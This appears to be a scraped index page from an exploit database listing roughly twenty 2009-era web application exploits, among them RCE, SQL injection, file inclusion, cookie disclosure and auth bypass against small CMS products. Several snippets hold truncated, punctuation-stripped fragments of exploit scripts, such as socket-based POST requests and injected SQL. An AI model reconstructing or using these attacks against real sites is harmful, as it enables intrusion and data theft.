Jieqi CMS 1.5 - Remote Code Execution

Jieqi CMS 1.5 - Remote Code Execution test"; $str = filegetcontents$url.$cmd; if filegetcontents$shell == 'test' exit"Expoilt Success!\nView Your shell:\t$shell\n"; else exit"Exploit Failed!\n"; ? milw0rm.com 2009-05-18...

Bitweaver 2.6 - 'saveFeed()' Remote Code Execution

saveFeed $rssversionname, $cacheFile ; ... it calls saveFeed function in an insecure way, arguments are built on $REQUESTversion var and may contain directory traversal sequences... now look at saveFeed function in /rss/feedcreator.class.php ... function saveFeed$filename="", $displayContents=tru...

Flatnux 2009-03-27 (Upload/ID) Multiple Remote Vulnerabilities

No description provided by source. Author: girex Homepage: girex.altervista.org Date: 17/04/2009 CMS: flatnux-2009-03-27 site: flatnux.altervista.org Bugs: Multiple remote vulnerabilities Flatnux suffers of multiple local file inclusions: output of my scanner Line: 10 File:...

Flatnux Local File Inclusion / Upload

Author: girex Homepage: girex.altervista.org Date: 17/04/2009 CMS: flatnux-2009-03-27 site: flatnux.altervista.org Bugs: Multiple remote vulnerabilities Flatnux suffers of multiple local file inclusions: output of my scanner Line: 10 File: D:/xampp/htdocs/flat/flatnux/sections/00News/admin.php...

Flatnux 2009-03-27 (Upload/ID) Multiple Remote Vulnerabilities

Exploit for unknown platform in category web applications ============================================================== Flatnux 2009-03-27 Upload/ID Multiple Remote Vulnerabilities ============================================================== Author: girex Date: 17/04/2009 CMS: flatnux-2009-03-...

EZ-Blog SQLi Vulnerability (Mar 2009) - Active Check

EZ-Blog is prone to an SQL injection SQLi vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. SPDX-FileCopyrightText: 2009 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respectiv...

MDPro Module My_eGallery (pid) Remote SQL Injection Exploit

No description provided by source. !/usr/bin/perl read; MDPro Module MyeGallery Remote SQL Injection Exploit by s3rg3770 && yeat - stakerathotmaildotit dork: inurl:module=MyeGallery pid note: works regardless of php.ini settings. read use IO::Socket; my $host,$path,$id = @ARGV; if @ARGV != 3 prin...

MemHT Portal <= 4.0.1 (pvtmsg) Delete All Private Messages Exploit

Exploit for unknown platform in category web applications ================================================================== MemHT Portal query"DELETE FROM memhtpvtmsg WHERE id=$value"; if isset$POST'deletepm' foreach $POST'deletepm' as $value $dblink-query"DELETE FROM memhtpvtmsg WHERE id=$value...

BusinessSpace &lt;= 1.2 (id) Remote SQL Injection Vulnerability

No description provided by source. \ /\ \ / | \ \ | / \ // / | \ | \ \ Y / | \ / / \ /| /\ / / / / / .OR.ID ECHOADV102$2009 ----------------------------------------------------------------------------------------- ECHOADV102$2009 BusinessSpace = 1.2 id Remote SQL Injection Vulnerability...

OpenHelpDesk 1.0.100 eval() Code Execution Exploit (meta)

Exploit for unknown platform in category web applications ========================================================= OpenHelpDesk 1.0.100 eval Code Execution Exploit meta ========================================================= $Id: phpeval.rb 5783 2008-10-23 02:43:21Z ramon $ This file is part o...

SolarCMS 0.53.8 - Forum Remote Cookies Disclosure

SolarCMS 0.53.8 - Forum Remote Cookies Disclosure ?php errorreporting0; / --------------------------------------------------------- SolarCMS 0.53.8 Forum Remote Cookies Disclosure Exploit --------------------------------------------------------- by athos - stakerathotmaildotit download on...

SolarCMS 0.53.8 (Forum) Remote Cookies Disclosure Exploit

Exploit for unknown platform in category web applications ========================================================= SolarCMS 0.53.8 Forum Remote Cookies Disclosure Exploit ========================================================= ?php errorreporting0; /...

Calendar Script 1.1 - Authentication Bypass

----------------------------------------------------- Calendar Script v1.1 Admin Login Bypass Vulnerability ----------------------------------------------------- by athos - stakerathotmaildotit http://www.hotscripts.com/jump.php?listingid=71365&jumptype=1 File Vuln "index.php" code details...

SolarCMS 0.53.8 - &#039;Forum&#039; Remote Cookies Disclosure

?php errorreporting0; / --------------------------------------------------------- SolarCMS 0.53.8 Forum Remote Cookies Disclosure Exploit --------------------------------------------------------- by athos - stakerathotmaildotit download on http://cms.maury91.org/ works regardless PHP.ini settings...

JVN#50327700 PHP vulnerable to cross-site scripting

PHP is an open source scripting language that is especially suited for Web development. PHP contains a cross-site scripting vulnerability as it does not properly handle errors. Impact An arbitrary script may be executed on the user's web browser. Solution Update the Software Apply the latest upda...

2532|Gigs 1.2.2 Stable Remote Command Execution Exploit

No description provided by source. ?php / ---------------------------------------------------------------- 2532|Gigs 1.2.2 Stable Remote Command Execution Exploit ---------------------------------------------------------------- by athos - stakerathotmaildotit works regardless php.ini settings...

2532Gigs 1.2.2 Stable - Remote Command Execution

2532Gigs 1.2.2 Stable - Remote Command Execution ---------------------------------------------------------------- Fix / errorreporting0; $host = explode'/',$argv1; $exec = $argv2 or usage; $sock = fsockopen$host0,80; $post = "content="; $leng = strlen$post; $data = "POST /$host1/calcssedit.php...

2532/Gigs 1.2.2 Stable - Remote Command Execution

---------------------------------------------------------------- Fix / errorreporting0; $host = explode'/',$argv1; $exec = $argv2 or usage; $sock = fsockopen$host0,80; $post = "content="; $leng = strlen$post; $data = "POST /$host1/calcssedit.php HTTP/1.1\r\n". "Host: $host0\r\n". "User-Agent: Lyn...

2532|Gigs 1.2.2 Stable Remote Command Execution Exploit

Exploit for unknown platform in category web applications ======================================================= 2532|Gigs 1.2.2 Stable Remote Command Execution Exploit ======================================================= ---------------------------------------------------------------- Fix /...

cpCommerce 1.2.6 (URL Rewrite) Input variable overwrite / Auth bypass

Exploit for unknown platform in category web applications ===================================================================== cpCommerce 1.2.6 URL Rewrite Input variable overwrite / Auth bypass ===================================================================== Author: girex CMS: cpCommerce...